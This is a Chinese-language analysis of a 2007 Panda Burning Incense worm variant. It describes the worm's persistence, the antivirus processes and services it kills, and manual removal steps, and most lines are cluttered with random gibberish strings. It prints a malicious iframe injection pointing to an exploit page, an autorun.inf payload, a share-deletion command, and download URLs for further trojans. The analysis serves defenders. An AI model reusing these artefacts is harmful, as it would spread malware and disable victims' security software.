熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe MhJq~G p  
E~{-RZNK  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） *i)GoQoB  
[ub,&j^  
中文名称：（尼姆亚，熊猫烧香） $+V{2k4X,  
8 rnr>Ee@  
病毒大小：68,570 字节 }7Pd\tG]  
C.(<KV{b  
编写语言：Borland Delphi 6.0 - 7.0 ygT,I+7\  
vhKeW(z  
加壳方式：FSG 2.0 -> bart/xt :t9(T?2  
S@Jl_`<  
发现时间：2007.1.16 Gvj@?62  
?Y
z.tg  
危害等级：高 -XD\,y%zi  
.8fOc.h8h  
一、病毒描述： *4=Fy:R]O  
&X +@,!  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 24|:VxO  
!tX14O~B-  
二：中毒现象： PP$Ig2Q  
sHh2>f@x$  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 AE^&hH0^  
WMl_$Fd6  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 'VR5>r  
?CM,k0  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 YHCXVu<.b  
e#&[4tQF  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> R)G'ILneV  
6S]GSS<  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 &[JI L=m5  
Og-Mnx3  
6：不能正常使用任务管理器，SREng.exe等工具。 T73saeN  
0~BQ8O=+mn  
7：无故的向外发包，连接局域网中其他机器。 V
}@c5)(j  

;41s&~eR  
三：技术分析 Cg)#B+  
QIo|t!7F  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe 28Q`O$=v  
5F&i/8Ib  
建立注册表自启动项: JEFW}M)UGv  
;#f_e;  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] ^W#[6]S  
2ZLK`^S  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" mX,#|qL
f  

D {>,2hC  
2：查找反病毒窗体病毒结束相关进程: ^k u~m5v  
=oiY'}%(i  
天网防火墙 j>0S3P,  
yf_<o  
virusscan xp><7{  
-c|O!Lc-  
symantec antivirus cDE?Xo'!  
F fl`;M
 
system safety monitor C8NbxP  
aU#8W.~  
system repair engineer Ig$5Ui  
VO++(G)  
wrapped gift killer REFisH-  
l  4~'CLi  
游戏木马检测大师 zA( 2+e 7  
V@cRJ3ZF  
超级巡警 S,Tm=} wj  
a$;+-Y  
3：结束以下进程: LnR3C:NO k  
t*Lo;]P  
mcshield.exe P`U5kNN  
yu}4L'e  
vstskmgr.exe hhYo9jTHW  
(m.]0v*&c  
naprdmgr.exe |Zkcs]8M!  
h1)p{5}H  
updaterui.exe i.K}(bo;b  
EXb{
/4  
tbmon.exe mc9$"  
YXD1B`23  
scan32.exe xB9^DURr\  
?&/9b)cS  
ravmond.exe F!aYK2  
5<d Y,FvX  
ccenter.exe p'xj:bB  
hkW"D<ii-  
ravtask.exe hM>xe8yE  
@X4;fd  
rav.exe *%8,G'"r?  
Qj3UO]>  
ravmon.exe )%#hpP M^  

s,` n=#  
ravmond.exe 6p1TI1(  
X Phw0aV  
ravstub.exe cH2 nG:H  
B=n]N+  
kvxp.kxp Q^0K8>G^  
j}h50*6KO  
kvmonxp.kxp
ijoR(R^r  
C"0gAN  
kvcenter.kxp ~Bu~?ZJmd  
$,6=.YuY  
kvsrvxp.exe O\G%rp L$w  
`=CF |I  
kregex.exe 4I,@aj46  
gvwR16N  
uihost.exe ?%;uR#4  

%/S BJ  
trojdie.kxp q$EVd9aN  
C,fIwqOr3  
frogagent.exe ~ZvZk  
/md`tqI>i<  
kvxp.kxp @&h<jM{D  
eeL%Yp3+  
kvmonxp.kxp r-[z!S  
9)f1CC]
 
kvcenter.kxp 3&2,[G04  
b<:s{f"t,  
kvsrvxp.exe )Hev-C"  
*23
  
kregex.exe #!,xjd  
?(g
kkYI  
uihost.exe av`b8cGg  
qTffh{q V  
trojdie.kxp l(&CO<4q?  
<`MHra8  
frogagent.exe .h7b 4J  
a"WnBdFZ  
logo1_.exe @br%:Nt  
y`(z_5ClT  
logo_1.exe :mg#&MZj<  
d(]LRIn~1  
rundl132.exe 6^ /C+zuX  
x/9`2X`~  
taskmgr.exe yM#W,@  
czHO)uQ?d`  
msconfig.exe wv?`3:co  
Oe;9[=
L[  
regedit.exe o'H$g%  
MN1|k  
sreng.exe kg !@i7  
4：禁用下列服务: v`v+M4upC  
4|XE f,  
schedule | sQ5`lV?  
 OSSMIPr  
sharedaccess A\SbuRty  
$@K+yOq+u  
rsccenter kdoE)C   
O#k?c }  
rsravmon [
n< U>up  
j"YJ1R-5  
rsccenter -iJ[9O  
1) @Wcc.  
kvwsc hW|t
~|j#_  
!Noabt  
kvsrvxp OZISh?  
ZZeqOu7^  
kvwsc Gt 2rJ<>  
M8g=t[\  
kvsrvxp HVk3F|]V  
n P69W  
kavsvc H=wmN0s{<  
$'&`k,a3|P  
avp >\>HRyt%  
*1elUI2Rg  
avp _ -?)-L&g  
\(;5YCCE  
kavsvc 63k8j[$  
vn kktD'n  
mcafeeframework ?j $z[_K  
@c{Z?>dUc#  
mcshield yJKez
IL\z  
9VP|a-  
mctaskmanager NIYAcLa@n8  
*^NC5=A(
d  
mcafeeframework S&R~*  
qed; UyN  
mcshield )Wc#?K  
~xXB !K~C  
mctaskmanager Xbap'/t  
|5Z@7  
navapsvc "+7~C6[s  
v3hNvcMpf  
wscsvc ['sIR+c%'O  
-R:1-0I$  
kpfwsvc D6v0n6w  
.oSKSld  
sndsrvc CBO8^M<K  
!'PPj_Hp]  
ccproxy |1t30_ /gS  
%VwB ?  
ccevtmgr #xts*{u-#  
x9@%L{*  
ccsetmgr 4RdpROK  
u}u2{pO!  
spbbcsvc v3~,1)#aI  
z3a te^PJF  
symantec core lc Q<78<#I  
nYE_WXY3V  
npfmntor ;jnnCXp>  
VT+GmS  
mskservice 
g*^"x&  
KsHovv-A  
firesvc F.T~txQ~u  
?+dI/jB4X  
5：删除下列注册表项: 4;j#7  
hDz_BvE  
software\microsoft\windows\currentversion\run\ravtask |e+I5  
YDDwvk H  
software\microsoft\windows\currentversion\run\kvmonxp VQLo vt"  
\8<bb<`  
software\microsoft\windows\currentversion\run\kav LkNfcBa_  
Y`c\{&M6  
software\microsoft\windows\currentversion\run\kavpersonal50 %PyU3  
C~6aX/:  
software\microsoft\windows\currentversion\run\mcafeeupdaterui ~A"ODLgU9  
A #ZaXu/:X  
software\microsoft\windows\currentversion\run\network associates error reporting service $`]<4I9d  
:*4yR
46  
software\microsoft\windows\currentversion\run\shstatexe Iye  
?(ks=rRK  
software\microsoft\windows\currentversion\run\ylive.exe lW7kBCsz#  
2
Ie50U  
software\microsoft\windows\currentversion\run\yassistse WL$WWA08_  
9]h
c{\  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） 8mx5K-/,y^  
! 4i  
7：跳过下列目录: N}s[0s  
r:YAn^Lg  
windows S0"OU0`N  
T@k&YJ  
winnt ty/jTo}  
\`4}h[  
systemvolumeinformation m>UJ; F  
b_
][Jye&P  
recycled 9}3W0F;  
zW+Y{^hf  
windowsnt MA"iM+Ar  
v "oO  
windowsupdate a}e7Q<cGj  
\'1%"JWK   
windowsmediaplayer .R:eN&Y8y  
,j2qY'wi  
outlookexpress A6#ob
  
~\
XB'  
netmeeting U>X06T  
@|5B  
commonfiles |a'Q^aT  
-6)ywq^{z  
complusapplications Ya=QN<  
Cr(pN[,  
commonfiles OE:t!66
 
zSkM8LM2  
messenger b8QW^Z  
Jbs:}]2  
installshieldinstallationinformation Qaagi `  
tD>m%1'&  
msn L{(r@Vu  
Sw(%j1uL  
microsoftfrontpage )P|Ql-rE4  
4e*0kItC  
moviemaker uw]e$,x?  
u5idH),<  
msngaminzone rhL<JTS  
tkJ/h<  
8：删除*.gho备份文件. v~@Y_`l  
b^A&K@[W#,  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. iY(hGlV  
Y*"%;e$tg  
autorun.inf内容： +mxsjcq0  
0A}'.LI  
程序代码 %
DRDe  
2c+q~8Jv  
[AutoRun] dQ^k-  
J-X5n 3I&  
OPEN=setup.exe A.<X78!^  
{5_*f)$[H  
shellexecute=setup.exe 0<>iMrD  
)8iDjNM<  
shell\Auto\command=setup.exe )bcMKZ   
h`n>6I  
10：删除共享：cmd.exe /c net share admin$ /del /y -Fl3m  
6^ KDc  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 qo}kwwWN;  
*nC<1.JW  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 ;$0za]x  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 j^64:3  
MvRuW:  
目前下载列表如下： k$+&  
<F!:dyl  
http://www.krvkr.com/down/cq.exe 2y<d@z:K  
s)To#  
http://www.krvkr.com/down/mh.exe Rx'7tff%I  
4CN8>J'-  
http://www.krvkr.com/down/my.exe ?X:RrZ:/  
Q"Bgr&RJ  
http://www.krvkr.com/down/wl.exe 3K#e]zoI  
1,pg:=N9  
http://www.krvkr.com/down/rx.exe uAJ_`o[  
Um9=<*p  
http://www.krvkr.com/down/wow.exe |E?%C
j^W  
bz>#}P=58G  
http://www.krvkr.com/down/zt.exe fnXl60C%  
}B]FHpi  
http://www.krvkr.com/down/wm.exe 4Uwt--KtFh  
AV8TP-Ls+  
http://www.krvkr.com/down/dj.exe xt`znNN  
50'6l X(v,  
http://www.krvkr.com/cn/iechajian.exe 5hD
E&hp  
1hMk\ -3S  
到此病毒行为分析完毕。 s5z@`M5'm  
rP3)TeG6  
四：Sec120.Com专家解决方案： e`_3= kI  
O&X-)g=  
1：关闭网络共享，断开网络。 9ge$)q
@3  
j}ruXg  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） f<zh-Gq  
fc\hQXYv  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 W``e6RX-  
dm.3.xXq  
4：删除注册表启动项 :Mt/6}
 
|]B]0J#_  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] ({i|  
w'qV~rN~tc  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" l_kH^ET  
f,?7,?x  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe pcEB-boI9  
+B&FZ4'  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 ^\wosB3E  
yBr{nFOgdY  
7：如果电脑上有脚本文件，将病毒代码全部删除。 pYa<u,>pN  
979L]H#  
8：关闭系统的自动播放功能。 "n05y}  
o-(jSaH :;  
这样就基本上将病毒清除了